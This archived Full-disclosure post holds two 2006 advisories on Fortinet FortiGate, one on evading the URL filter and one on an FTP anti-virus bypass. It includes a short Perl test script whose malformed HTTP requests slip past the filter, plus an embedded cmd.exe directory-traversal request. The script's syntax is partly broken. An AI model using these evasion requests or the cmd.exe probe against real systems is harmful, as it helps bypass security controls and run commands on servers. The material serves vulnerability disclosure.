08/25/2005 The vendor said this this was escalated to the dev team.
01/04/2006 Status asked to the vendor.
02/06/2006 The vendor was informed that this information will be
published in 1 week.


Discovered by Mathieu Dessus (mdessus(a)


Perl script for testing the vuln:

# Made by (Mathieu Dessus)
# Make a filter for /test* URL in the Fortigate and
# remove the # depending on which HTTP request you want to test

use IO::Socket;

$target = '';

# Detected
$data = "GET /test HTTP/1.1\r
Host: $target\r
Pragma: no-cache\r
Accept: */*\r
# Not detected
$data = "GET /test2 HTTP/1.1
Host: $target
Pragma: no-cache
Accept: */*


# Not detected
$data = "GET /test3 HTTP/1.0\r\n\r\n";
# Detected
#$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n";
# Detected :)
#$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
  PeerAddr => $target,
  PeerPort => '80',
  Proto => 'tcp',
die "Could not create socket: $!\n" unless $sock;
print $sock $data;
read($sock, $ret, 600);
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[Full-disclosure] Bypass Fortinet anti-virus using FTP

2006-02-13 Thread Mathieu Dessus
Bypass Fortinet anti-virus using FTP

Severity:  Low
Impact:Bypass Fortinet anti-virus
Vulnerabilty type: Design error
Affected products: FortiGate v2.8
CVE reference: CAN-2005-3057

Vulnerability Description:

It is possible to bypass the Fortinet anti-virus engine when sending
files over FTP under certain conditions. Those conditions will be
disclosed later since Fortinet has not fixed the problem yet.

This bug was tested on FortiOS v2.8MR10 and v3beta.


No solution yet.

Vendor Response:

07/28/2005 Vendor was first contacted by mail.
07/28/2005 He replyed to use is support web site to re-enter the information.
08/01/2005 The vendor asked for more information, which was provided
the same day.
08/04/2005 The vendor replyed that they have reproduced the problem.
01/04/2006 Status asked to the vendor.
02/06/2006 The vendor was informed that this information will be
published in 1 week.


Discovered by Mathieu Dessus (mdessus(a)
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